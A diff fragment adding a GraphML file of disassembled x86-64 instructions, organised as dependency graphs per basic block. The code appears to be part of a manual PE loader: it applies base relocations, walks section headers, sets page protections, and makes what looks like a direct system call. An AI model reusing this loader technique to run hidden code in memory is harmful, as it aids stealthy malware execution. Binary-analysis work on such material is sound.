+        <data key="type">instructions</data>
+        <node id="block.0x13e7:instruction.0x13e7">
+          <data key="address">0x13e7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883c608</data>
+          <data key="instruction.source">add rsi, 8</data>
+        </node>
+        <node id="block.0x13e7:instruction.0x13eb">
+          <data key="address">0x13eb</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883c708</data>
+          <data key="instruction.source">add rdi, 8</data>
+        </node>
+        <node id="block.0x13e7:instruction.0x13ef">
+          <data key="address">0x13ef</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eba9</data>
+          <data key="instruction.source">jmp 0x139a</data>
+        </node>
+        <edge source="block.0x13e7:instruction.0x13e7" target="block.0x13e7:instruction.0x13eb"/>
+        <edge source="block.0x13e7:instruction.0x13eb" target="block.0x13e7:instruction.0x13ef"/>
+      </graph>
+    </node>
+    <node id="block.0x13f1">
+      <data key="address">0x13f1</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x13f1</data>
+        <data key="type">instructions</data>
+        <node id="block.0x13f1:instruction.0x13f1">
+          <data key="address">0x13f1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4983c614</data>
+          <data key="instruction.source">add r14, 0x14</data>
+        </node>
+        <node id="block.0x13f1:instruction.0x13f5">
+          <data key="address">0x13f5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e962ffffff</data>
+          <data key="instruction.source">jmp 0x135c</data>
+        </node>
+        <edge source="block.0x13f1:instruction.0x13f1" target="block.0x13f1:instruction.0x13f5"/>
+      </graph>
+    </node>
+    <node id="block.0x13fa">
+      <data key="address">0x13fa</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x13fa</data>
+        <data key="type">instructions</data>
+        <node id="block.0x13fa:instruction.0x13fa">
+          <data key="address">0x13fa</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b45d0</data>
+          <data key="instruction.source">mov rax, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x13fa:instruction.0x13fe">
+          <data key="address">0x13fe</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">498b4c2430</data>
+          <data key="instruction.source">mov rcx, qword ptr [r12 + 0x30]</data>
+        </node>
+        <node id="block.0x13fa:instruction.0x1403">
+          <data key="address">0x1403</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4829c8</data>
+          <data key="instruction.source">sub rax, rcx</data>
+        </node>
+        <node id="block.0x13fa:instruction.0x1406">
+          <data key="address">0x1406</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488945d8</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x28], rax</data>
+        </node>
+        <node id="block.0x13fa:instruction.0x140a">
+          <data key="address">0x140a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b8424b0000000</data>
+          <data key="instruction.source">mov eax, dword ptr [r12 + 0xb0]</data>
+        </node>
+        <node id="block.0x13fa:instruction.0x1412">
+          <data key="address">0x1412</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x13fa:instruction.0x1414">
+          <data key="address">0x1414</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7478</data>
+          <data key="instruction.source">je 0x148e</data>
+        </node>
+        <edge source="block.0x13fa:instruction.0x13fa" target="block.0x13fa:instruction.0x1403"/>
+        <edge source="block.0x13fa:instruction.0x13fe" target="block.0x13fa:instruction.0x1403"/>
+        <edge source="block.0x13fa:instruction.0x1403" target="block.0x13fa:instruction.0x1406"/>
+        <edge source="block.0x13fa:instruction.0x1403" target="block.0x13fa:instruction.0x140a"/>
+        <edge source="block.0x13fa:instruction.0x1403" target="block.0x13fa:instruction.0x1412"/>
+        <edge source="block.0x13fa:instruction.0x1406" target="block.0x13fa:instruction.0x140a"/>
+        <edge source="block.0x13fa:instruction.0x140a" target="block.0x13fa:instruction.0x1412"/>
+        <edge source="block.0x13fa:instruction.0x1412" target="block.0x13fa:instruction.0x1414"/>
+      </graph>
+    </node>
+    <node id="block.0x1416">
+      <data key="address">0x1416</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1416</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1416:instruction.0x1416">
+          <data key="address">0x1416</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b8c24b4000000</data>
+          <data key="instruction.source">mov ecx, dword ptr [r12 + 0xb4]</data>
+        </node>
+        <node id="block.0x1416:instruction.0x141e">
+          <data key="address">0x141e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c9</data>
+          <data key="instruction.source">test ecx, ecx</data>
+        </node>
+        <node id="block.0x1416:instruction.0x1420">
+          <data key="address">0x1420</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">746c</data>
+          <data key="instruction.source">je 0x148e</data>
+        </node>
+        <edge source="block.0x1416:instruction.0x1416" target="block.0x1416:instruction.0x141e"/>
+        <edge source="block.0x1416:instruction.0x141e" target="block.0x1416:instruction.0x1420"/>
+      </graph>
+    </node>
+    <node id="block.0x1422">
+      <data key="address">0x1422</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1422</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1422:instruction.0x1422">
+          <data key="address">0x1422</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8b75d0</data>
+          <data key="instruction.source">mov r14, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x1422:instruction.0x1426">
+          <data key="address">0x1426</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4901c6</data>
+          <data key="instruction.source">add r14, rax</data>
+        </node>
+        <edge source="block.0x1422:instruction.0x1422" target="block.0x1422:instruction.0x1426"/>
+      </graph>
+    </node>
+    <node id="block.0x1429">
+      <data key="address">0x1429</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1429</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1429:instruction.0x1429">
+          <data key="address">0x1429</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b4604</data>
+          <data key="instruction.source">mov eax, dword ptr [r14 + 4]</data>
+        </node>
+        <node id="block.0x1429:instruction.0x142d">
+          <data key="address">0x142d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x1429:instruction.0x142f">
+          <data key="address">0x142f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">745d</data>
+          <data key="instruction.source">je 0x148e</data>
+        </node>
+        <edge source="block.0x1429:instruction.0x1429" target="block.0x1429:instruction.0x142d"/>
+        <edge source="block.0x1429:instruction.0x142d" target="block.0x1429:instruction.0x142f"/>
+      </graph>
+    </node>
+    <node id="block.0x1431">
+      <data key="address">0x1431</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1431</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1431:instruction.0x1431">
+          <data key="address">0x1431</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83e808</data>
+          <data key="instruction.source">sub eax, 8</data>
+        </node>
+        <node id="block.0x1431:instruction.0x1434">
+          <data key="address">0x1434</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">d1e8</data>
+          <data key="instruction.source">shr eax, 1</data>
+        </node>
+        <node id="block.0x1431:instruction.0x1436">
+          <data key="address">0x1436</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4189c7</data>
+          <data key="instruction.source">mov r15d, eax</data>
+        </node>
+        <node id="block.0x1431:instruction.0x1439">
+          <data key="address">0x1439</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b06</data>
+          <data key="instruction.source">mov eax, dword ptr [r14]</data>
+        </node>
+        <node id="block.0x1431:instruction.0x143c">
+          <data key="address">0x143c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8b6dd0</data>
+          <data key="instruction.source">mov r13, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x1431:instruction.0x1440">
+          <data key="address">0x1440</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4901c5</data>
+          <data key="instruction.source">add r13, rax</data>
+        </node>
+        <node id="block.0x1431:instruction.0x1443">
+          <data key="address">0x1443</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4d8d6608</data>
+          <data key="instruction.source">lea r12, [r14 + 8]</data>
+        </node>
+        <edge source="block.0x1431:instruction.0x1431" target="block.0x1431:instruction.0x1434"/>
+        <edge source="block.0x1431:instruction.0x1434" target="block.0x1431:instruction.0x1436"/>
+        <edge source="block.0x1431:instruction.0x1434" target="block.0x1431:instruction.0x1439"/>
+        <edge source="block.0x1431:instruction.0x1434" target="block.0x1431:instruction.0x1440"/>
+        <edge source="block.0x1431:instruction.0x1436" target="block.0x1431:instruction.0x1439"/>
+        <edge source="block.0x1431:instruction.0x1439" target="block.0x1431:instruction.0x1440"/>
+        <edge source="block.0x1431:instruction.0x143c" target="block.0x1431:instruction.0x1440"/>
+      </graph>
+    </node>
+    <node id="block.0x1447">
+      <data key="address">0x1447</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1447</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1447:instruction.0x1447">
+          <data key="address">0x1447</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4585ff</data>
+          <data key="instruction.source">test r15d, r15d</data>
+        </node>
+        <node id="block.0x1447:instruction.0x144a">
+          <data key="address">0x144a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7439</data>
+          <data key="instruction.source">je 0x1485</data>
+        </node>
+        <edge source="block.0x1447:instruction.0x1447" target="block.0x1447:instruction.0x144a"/>
+      </graph>
+    </node>
+    <node id="block.0x144c">
+      <data key="address">0x144c</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x144c</data>
+        <data key="type">instructions</data>
+        <node id="block.0x144c:instruction.0x144c">
+          <data key="address">0x144c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">410fb70424</data>
+          <data key="instruction.source">movzx eax, word ptr [r12]</data>
+        </node>
+        <node id="block.0x144c:instruction.0x1451">
+          <data key="address">0x1451</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">89c3</data>
+          <data key="instruction.source">mov ebx, eax</data>
+        </node>
+        <node id="block.0x144c:instruction.0x1453">
+          <data key="address">0x1453</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c1eb0c</data>
+          <data key="instruction.source">shr ebx, 0xc</data>
+        </node>
+        <node id="block.0x144c:instruction.0x1456">
+          <data key="address">0x1456</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">25ff0f0000</data>
+          <data key="instruction.source">and eax, 0xfff</data>
+        </node>
+        <node id="block.0x144c:instruction.0x145b">
+          <data key="address">0x145b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83fb0a</data>
+          <data key="instruction.source">cmp ebx, 0xa</data>
+        </node>
+        <node id="block.0x144c:instruction.0x145e">
+          <data key="address">0x145e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7407</data>
+          <data key="instruction.source">je 0x1467</data>
+        </node>
+        <edge source="block.0x144c:instruction.0x144c" target="block.0x144c:instruction.0x1451"/>
+        <edge source="block.0x144c:instruction.0x144c" target="block.0x144c:instruction.0x1456"/>
+        <edge source="block.0x144c:instruction.0x1451" target="block.0x144c:instruction.0x1453"/>
+        <edge source="block.0x144c:instruction.0x1451" target="block.0x144c:instruction.0x1456"/>
+        <edge source="block.0x144c:instruction.0x1453" target="block.0x144c:instruction.0x1456"/>
+        <edge source="block.0x144c:instruction.0x1453" target="block.0x144c:instruction.0x145b"/>
+        <edge source="block.0x144c:instruction.0x1456" target="block.0x144c:instruction.0x145b"/>
+        <edge source="block.0x144c:instruction.0x145b" target="block.0x144c:instruction.0x145e"/>
+      </graph>
+    </node>
+    <node id="block.0x1460">
+      <data key="address">0x1460</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1460</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1460:instruction.0x1460">
+          <data key="address">0x1460</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83fb03</data>
+          <data key="instruction.source">cmp ebx, 3</data>
+        </node>
+        <node id="block.0x1460:instruction.0x1463">
+          <data key="address">0x1463</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">740d</data>
+          <data key="instruction.source">je 0x1472</data>
+        </node>
+        <edge source="block.0x1460:instruction.0x1460" target="block.0x1460:instruction.0x1463"/>
+      </graph>
+    </node>
+    <node id="block.0x1465">
+      <data key="address">0x1465</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1465</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1465:instruction.0x1465">
+          <data key="address">0x1465</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb15</data>
+          <data key="instruction.source">jmp 0x147c</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x1467">
+      <data key="address">0x1467</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1467</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1467:instruction.0x1467">
+          <data key="address">0x1467</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b55d8</data>
+          <data key="instruction.source">mov rdx, qword ptr [rbp - 0x28]</data>
+        </node>
+        <node id="block.0x1467:instruction.0x146b">
+          <data key="address">0x146b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4901540500</data>
+          <data key="instruction.source">add qword ptr [r13 + rax], rdx</data>
+        </node>
+        <node id="block.0x1467:instruction.0x1470">
+          <data key="address">0x1470</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb0a</data>
+          <data key="instruction.source">jmp 0x147c</data>
+        </node>
+        <edge source="block.0x1467:instruction.0x1467" target="block.0x1467:instruction.0x146b"/>
+        <edge source="block.0x1467:instruction.0x146b" target="block.0x1467:instruction.0x1470"/>
+      </graph>
+    </node>
+    <node id="block.0x1472">
+      <data key="address">0x1472</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1472</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1472:instruction.0x1472">
+          <data key="address">0x1472</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b55d8</data>
+          <data key="instruction.source">mov edx, dword ptr [rbp - 0x28]</data>
+        </node>
+        <node id="block.0x1472:instruction.0x1475">
+          <data key="address">0x1475</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4101540500</data>
+          <data key="instruction.source">add dword ptr [r13 + rax], edx</data>
+        </node>
+        <node id="block.0x1472:instruction.0x147a">
+          <data key="address">0x147a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb00</data>
+          <data key="instruction.source">jmp 0x147c</data>
+        </node>
+        <edge source="block.0x1472:instruction.0x1472" target="block.0x1472:instruction.0x1475"/>
+      </graph>
+    </node>
+    <node id="block.0x147c">
+      <data key="address">0x147c</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x147c</data>
+        <data key="type">instructions</data>
+        <node id="block.0x147c:instruction.0x147c">
+          <data key="address">0x147c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4983c402</data>
+          <data key="instruction.source">add r12, 2</data>
+        </node>
+        <node id="block.0x147c:instruction.0x1480">
+          <data key="address">0x1480</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">41ffcf</data>
+          <data key="instruction.source">dec r15d</data>
+        </node>
+        <node id="block.0x147c:instruction.0x1483">
+          <data key="address">0x1483</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ebc2</data>
+          <data key="instruction.source">jmp 0x1447</data>
+        </node>
+        <edge source="block.0x147c:instruction.0x147c" target="block.0x147c:instruction.0x1480"/>
+        <edge source="block.0x147c:instruction.0x1480" target="block.0x147c:instruction.0x1483"/>
+      </graph>
+    </node>
+    <node id="block.0x1485">
+      <data key="address">0x1485</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1485</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1485:instruction.0x1485">
+          <data key="address">0x1485</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b4604</data>
+          <data key="instruction.source">mov eax, dword ptr [r14 + 4]</data>
+        </node>
+        <node id="block.0x1485:instruction.0x1489">
+          <data key="address">0x1489</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4901c6</data>
+          <data key="instruction.source">add r14, rax</data>
+        </node>
+        <node id="block.0x1485:instruction.0x148c">
+          <data key="address">0x148c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb9b</data>
+          <data key="instruction.source">jmp 0x1429</data>
+        </node>
+        <edge source="block.0x1485:instruction.0x1485" target="block.0x1485:instruction.0x1489"/>
+        <edge source="block.0x1485:instruction.0x1489" target="block.0x1485:instruction.0x148c"/>
+      </graph>
+    </node>
+    <node id="block.0x148e">
+      <data key="address">0x148e</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x148e</data>
+        <data key="type">instructions</data>
+        <node id="block.0x148e:instruction.0x148e">
+          <data key="address">0x148e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b4dd0</data>
+          <data key="instruction.source">mov rcx, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x148e:instruction.0x1492">
+          <data key="address">0x1492</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b413c</data>
+          <data key="instruction.source">mov eax, dword ptr [rcx + 0x3c]</data>
+        </node>
+        <node id="block.0x148e:instruction.0x1495">
+          <data key="address">0x1495</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8d2401</data>
+          <data key="instruction.source">lea r12, [rcx + rax]</data>
+        </node>
+        <node id="block.0x148e:instruction.0x1499">
+          <data key="address">0x1499</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">490fb7442414</data>
+          <data key="instruction.source">movzx rax, word ptr [r12 + 0x14]</data>
+        </node>
+        <node id="block.0x148e:instruction.0x149f">
+          <data key="address">0x149f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4d8d6c0418</data>
+          <data key="instruction.source">lea r13, [r12 + rax + 0x18]</data>
+        </node>
+        <node id="block.0x148e:instruction.0x14a4">
+          <data key="address">0x14a4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">450fb77c2406</data>
+          <data key="instruction.source">movzx r15d, word ptr [r12 + 6]</data>
+        </node>
+        <edge source="block.0x148e:instruction.0x148e" target="block.0x148e:instruction.0x1492"/>
+        <edge source="block.0x148e:instruction.0x148e" target="block.0x148e:instruction.0x1495"/>
+        <edge source="block.0x148e:instruction.0x1492" target="block.0x148e:instruction.0x1495"/>
+        <edge source="block.0x148e:instruction.0x1492" target="block.0x148e:instruction.0x1499"/>
+        <edge source="block.0x148e:instruction.0x1495" target="block.0x148e:instruction.0x1499"/>
+        <edge source="block.0x148e:instruction.0x1495" target="block.0x148e:instruction.0x149f"/>
+        <edge source="block.0x148e:instruction.0x1495" target="block.0x148e:instruction.0x14a4"/>
+        <edge source="block.0x148e:instruction.0x1499" target="block.0x148e:instruction.0x149f"/>
+      </graph>
+    </node>
+    <node id="block.0x14aa">
+      <data key="address">0x14aa</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x14aa</data>
+        <data key="type">instructions</data>
+        <node id="block.0x14aa:instruction.0x14aa">
+          <data key="address">0x14aa</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4585ff</data>
+          <data key="instruction.source">test r15d, r15d</data>
+        </node>
+        <node id="block.0x14aa:instruction.0x14ad">
+          <data key="address">0x14ad</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0f8486000000</data>
+          <data key="instruction.source">je 0x1539</data>
+        </node>
+        <edge source="block.0x14aa:instruction.0x14aa" target="block.0x14aa:instruction.0x14ad"/>
+      </graph>
+    </node>
+    <node id="block.0x14b3">
+      <data key="address">0x14b3</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x14b3</data>
+        <data key="type">instructions</data>
+        <node id="block.0x14b3:instruction.0x14b3">
+          <data key="address">0x14b3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b4508</data>
+          <data key="instruction.source">mov eax, dword ptr [r13 + 8]</data>
+        </node>
+        <node id="block.0x14b3:instruction.0x14b7">
+          <data key="address">0x14b7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x14b3:instruction.0x14b9">
+          <data key="address">0x14b9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7472</data>
+          <data key="instruction.source">je 0x152d</data>
+        </node>
+        <edge source="block.0x14b3:instruction.0x14b3" target="block.0x14b3:instruction.0x14b7"/>
+        <edge source="block.0x14b3:instruction.0x14b7" target="block.0x14b3:instruction.0x14b9"/>
+      </graph>
+    </node>
+    <node id="block.0x14bb">
+      <data key="address">0x14bb</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x14bb</data>
+        <data key="type">instructions</data>
+        <node id="block.0x14bb:instruction.0x14bb">
+          <data key="address">0x14bb</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b4524</data>
+          <data key="instruction.source">mov eax, dword ptr [r13 + 0x24]</data>
+        </node>
+        <node id="block.0x14bb:instruction.0x14bf">
+          <data key="address">0x14bf</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c1e81d</data>
+          <data key="instruction.source">shr eax, 0x1d</data>
+        </node>
+        <node id="block.0x14bb:instruction.0x14c2">
+          <data key="address">0x14c2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83e007</data>
+          <data key="instruction.source">and eax, 7</data>
+        </node>
+        <node id="block.0x14bb:instruction.0x14c5">
+          <data key="address">0x14c5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488d1d06000000</data>
+          <data key="instruction.source">lea rbx, [rip + 6]</data>
+        </node>
+        <node id="block.0x14bb:instruction.0x14cc">
+          <data key="address">0x14cc</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0fb61c03</data>
+          <data key="instruction.source">movzx ebx, byte ptr [rbx + rax]</data>
+        </node>
+        <node id="block.0x14bb:instruction.0x14d0">
+          <data key="address">0x14d0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb08</data>
+          <data key="instruction.source">jmp 0x14da</data>
+        </node>
+        <edge source="block.0x14bb:instruction.0x14bb" target="block.0x14bb:instruction.0x14bf"/>
+        <edge source="block.0x14bb:instruction.0x14bf" target="block.0x14bb:instruction.0x14c2"/>
+        <edge source="block.0x14bb:instruction.0x14c2" target="block.0x14bb:instruction.0x14cc"/>
+        <edge source="block.0x14bb:instruction.0x14c5" target="block.0x14bb:instruction.0x14cc"/>
+        <edge source="block.0x14bb:instruction.0x14cc" target="block.0x14bb:instruction.0x14d0"/>
+      </graph>
+    </node>
+    <node id="block.0x14d2">
+      <data key="address">0x14d2</data>
+      <data key="type">data</data>
+      <data key="data.hex">0110022004400440</data>
+    </node>
+    <node id="block.0x14da">
+      <data key="address">0x14da</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x14da</data>
+        <data key="type">instructions</data>
+        <node id="block.0x14da:instruction.0x14da">
+          <data key="address">0x14da</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883ec48</data>
+          <data key="instruction.source">sub rsp, 0x48</data>
+        </node>
+        <node id="block.0x14da:instruction.0x14de">
+          <data key="address">0x14de</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b450c</data>
+          <data key="instruction.source">mov eax, dword ptr [r13 + 0xc]</data>
+        </node>
+        <node id="block.0x14da:instruction.0x14e2">
+          <data key="address">0x14e2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b4dd0</data>
+          <data key="instruction.source">mov rcx, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x14da:instruction.0x14e6">
+          <data key="address">0x14e6</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4801c1</data>
+          <data key="instruction.source">add rcx, rax</data>
+        </node>
+        <node id="block.0x14da:instruction.0x14e9">
+          <data key="address">0x14e9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48894c2430</data>
+          <data key="instruction.source">mov qword ptr [rsp + 0x30], rcx</data>
+        </node>
+        <node id="block.0x14da:instruction.0x14ee">
+          <data key="address">0x14ee</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b4508</data>
+          <data key="instruction.source">mov eax, dword ptr [r13 + 8]</data>
+        </node>
+        <node id="block.0x14da:instruction.0x14f2">
+          <data key="address">0x14f2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4889442438</data>
+          <data key="instruction.source">mov qword ptr [rsp + 0x38], rax</data>
+        </node>
+        <node id="block.0x14da:instruction.0x14f7">
+          <data key="address">0x14f7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c744244000000000</data>
+          <data key="instruction.source">mov dword ptr [rsp + 0x40], 0</data>
+        </node>
+        <node id="block.0x14da:instruction.0x14ff">
+          <data key="address">0x14ff</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48c7c1ffffffff</data>
+          <data key="instruction.source">mov rcx, 0xffffffffffffffff</data>
+        </node>
+        <node id="block.0x14da:instruction.0x1506">
+          <data key="address">0x1506</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488d542430</data>
+          <data key="instruction.source">lea rdx, [rsp + 0x30]</data>
+        </node>
+        <node id="block.0x14da:instruction.0x150b">
+          <data key="address">0x150b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8d442438</data>
+          <data key="instruction.source">lea r8, [rsp + 0x38]</data>
+        </node>
+        <node id="block.0x14da:instruction.0x1510">
+          <data key="address">0x1510</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4189d9</data>
+          <data key="instruction.source">mov r9d, ebx</data>
+        </node>
+        <node id="block.0x14da:instruction.0x1513">
+          <data key="address">0x1513</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488d442440</data>
+          <data key="instruction.source">lea rax, [rsp + 0x40]</data>
+        </node>
+        <node id="block.0x14da:instruction.0x1518">
+          <data key="address">0x1518</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4889442420</data>
+          <data key="instruction.source">mov qword ptr [rsp + 0x20], rax</data>
+        </node>
+        <node id="block.0x14da:instruction.0x151d">
+          <data key="address">0x151d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8b9568ffffff</data>
+          <data key="instruction.source">mov r10, qword ptr [rbp - 0x98]</data>
+        </node>
+        <node id="block.0x14da:instruction.0x1524">
+          <data key="address">0x1524</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e8b5000000</data>
+          <data key="instruction.source">call 0x15de</data>
+        </node>
+        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x14e6"/>
+        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x14e9"/>
+        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x14f2"/>
+        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x14f7"/>
+        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x1506"/>
+        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x150b"/>
+        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x1513"/>
+        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x1518"/>
+        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x1524"/>
+        <edge source="block.0x14da:instruction.0x14de" target="block.0x14da:instruction.0x14e6"/>
+        <edge source="block.0x14da:instruction.0x14de" target="block.0x14da:instruction.0x14ee"/>
+        <edge source="block.0x14da:instruction.0x14e2" target="block.0x14da:instruction.0x14e6"/>
+        <edge source="block.0x14da:instruction.0x14e6" target="block.0x14da:instruction.0x14e9"/>
+        <edge source="block.0x14da:instruction.0x14e6" target="block.0x14da:instruction.0x14ee"/>
+        <edge source="block.0x14da:instruction.0x14e6" target="block.0x14da:instruction.0x14ff"/>
+        <edge source="block.0x14da:instruction.0x14e9" target="block.0x14da:instruction.0x14ff"/>
+        <edge source="block.0x14da:instruction.0x14e9" target="block.0x14da:instruction.0x1524"/>
+        <edge source="block.0x14da:instruction.0x14ee" target="block.0x14da:instruction.0x14f2"/>
+        <edge source="block.0x14da:instruction.0x14ee" target="block.0x14da:instruction.0x1513"/>
+        <edge source="block.0x14da:instruction.0x14f2" target="block.0x14da:instruction.0x1513"/>
+        <edge source="block.0x14da:instruction.0x14f2" target="block.0x14da:instruction.0x1524"/>
+        <edge source="block.0x14da:instruction.0x14f7" target="block.0x14da:instruction.0x1524"/>
+        <edge source="block.0x14da:instruction.0x14ff" target="block.0x14da:instruction.0x1524"/>
+        <edge source="block.0x14da:instruction.0x1506" target="block.0x14da:instruction.0x1524"/>
+        <edge source="block.0x14da:instruction.0x150b" target="block.0x14da:instruction.0x1524"/>
